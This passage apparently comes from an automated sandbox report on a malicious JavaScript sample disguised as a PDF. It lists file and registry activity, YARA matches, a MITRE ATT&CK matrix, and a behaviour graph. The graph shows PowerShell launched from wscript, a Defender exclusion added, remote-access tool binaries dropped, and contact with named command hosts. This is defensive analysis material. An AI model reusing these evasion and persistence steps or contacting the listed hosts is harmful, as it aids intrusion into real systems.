          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exeCode function: 39_2_6B2CFC20 GetSystemTimeAsFileTime,39_2_6B2CFC20
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD Blob
          Source: Yara matchFile source: 39.0.rfusclient.exe.bb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000027.00000000.2412845653.00000000015F6000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe, type: DROPPED

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information32
          Scripting          		1
          Replication Through Removable Media          		1
          Native API          		32
          Scripting          		1
          DLL Side-Loading          		12
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          DLL Side-Loading          		111
          Process Injection          		14
          Obfuscated Files or Information          		LSASS Memory11
          Peripheral Device Discovery          		Remote Desktop ProtocolData from Removable Media21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          PowerShell          		Login HookLogin Hook1
          DLL Side-Loading          		NTDS34
          System Information Discovery          		Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          File Deletion          		LSA Secrets1
          Query Registry          		SSHKeylogging3
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts122
          Masquerading          		Cached Domain Credentials11
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Modify Registry          		DCSync1
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job121
          Virtualization/Sandbox Evasion          		Proc Filesystem121
          Virtualization/Sandbox Evasion          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
          Process Injection          		/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1631720 Sample: U0443.pdf.js Startdate: 07/03/2025 Architecture: WINDOWS Score: 100 88 floatnightlife.com 2->88 104 Malicious sample detected (through community Yara rule) 2->104 106 Multi AV Scanner detection for submitted file 2->106 108 JavaScript source code contains functionality to generate code involving a shell, file or stream 2->108 110 6 other signatures 2->110 9 wscript.exe 1 1 2->9         started        12 msiexec.exe 2->12         started        15 rutserv.exe 2->15         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 120 JScript performs obfuscated calls to suspicious functions 9->120 122 Wscript starts Powershell (via cmd or directly) 9->122 124 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->124 128 2 other signatures 9->128 20 wscript.exe 13 9->20         started        24 wscript.exe 9->24         started        26 wscript.exe 9->26         started        29 wscript.exe 9->29         started        80 C:\Program Files (x86)\...\rutserv.exe, PE32 12->80 dropped 82 C:\Program Files (x86)\...\rfusclient.exe, PE32 12->82 dropped 84 server_stop_27D787...EA10FB36BB4D2F9.exe, PE32 12->84 dropped 86 41 other files (none is malicious) 12->86 dropped 31 rfusclient.exe 12->31         started        33 rutserv.exe 12->33         started        37 3 other processes 12->37 100 194.180.158.11 MIVOCLOUDMD unknown 15->100 102 5.181.158.121 MIVOCLOUDMD Moldova Republic of 15->102 126 Query firmware table information (likely to detect VMs) 15->126 35 rfusclient.exe 15->35         started        39 2 other processes 15->39 file6 signatures7 process8 dnsIp9 90 floatnightlife.com 217.21.85.207, 443, 49691, 49692 IPPLANET-ASIL United Kingdom 20->90 112 Wscript starts Powershell (via cmd or directly) 20->112 114 Adds a directory exclusion to Windows Defender 20->114 41 chrome.exe 15 20->41         started        44 powershell.exe 23 20->44         started        116 System process connects to network (likely due to code injection or exploit) 24->116 47 powershell.exe 24->47         started        49 chrome.exe 24->49         started        78 C:\Users\user\AppData\Roaming\putty.msi, Composite 26->78 dropped 51 powershell.exe 23 26->51         started        59 2 other processes 26->59 53 powershell.exe 29->53         started        55 chrome.exe 29->55         started        118 Query firmware table information (likely to detect VMs) 35->118 57 rfusclient.exe 35->57         started        file10 signatures11 process12 dnsIp13 92 192.168.2.5, 443, 49675, 49690 unknown unknown 41->92 94 192.168.2.11 unknown unknown 41->94 61 chrome.exe 41->61         started        64 chrome.exe 41->64         started        130 Loading BitLocker PowerShell Module 44->130 66 conhost.exe 44->66         started        68 conhost.exe 47->68         started        70 conhost.exe 51->70         started        72 conhost.exe 53->72         started        132 Query firmware table information (likely to detect VMs) 57->132 74 conhost.exe 59->74         started        76 msiexec.exe 59->76         started        signatures14 process15 dnsIp16 96 floatnightlife.com 61->96 98 www.google.com 142.250.186.132, 443, 49702, 49707 GOOGLEUS United States 61->98

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.